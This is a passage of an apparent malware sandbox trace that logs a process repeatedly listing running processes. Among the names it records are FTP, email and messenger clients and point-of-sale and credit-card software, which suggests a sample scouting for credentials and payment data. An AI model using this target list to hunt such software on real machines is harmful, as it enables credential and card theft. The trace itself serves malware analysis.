lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0221.917] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0221.953] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0221.956] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0221.958] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0221.960] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0221.962] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0221.964] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0221.968] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0221.970] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0221.972] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0221.974] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0221.976] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0221.978] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0221.980] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0221.985] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0221.987] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0221.989] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0221.991] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0221.993] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0222.074] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0222.076] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0222.078] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0222.080] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0222.083] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0222.085] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0222.087] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0222.092] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0222.095] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0222.097] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0222.099] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0222.100] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0222.102] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0222.105] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0222.110] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0222.112] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0222.121] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0222.123] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0222.125] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0222.127] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0222.129] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0222.131] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0222.133] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0222.139] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0222.141] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0222.143] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0222.145] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0222.147] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0222.149] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0222.151] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0222.157] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0222.159] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0222.161] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0222.163] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.172] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.174] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.176] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0222.178] CloseHandle (hObject=0x2278) returned 1 [0222.178] Sleep (dwMilliseconds=0x64) [0222.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0222.305] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.306] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.310] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.312] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.313] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.314] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.316] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.318] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.319] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.321] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.322] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.324] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.328] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.329] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.330] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.332] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.333] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.334] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.336] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.337] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.390] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0222.392] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0222.394] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.395] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.396] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.398] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0222.399] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0222.401] 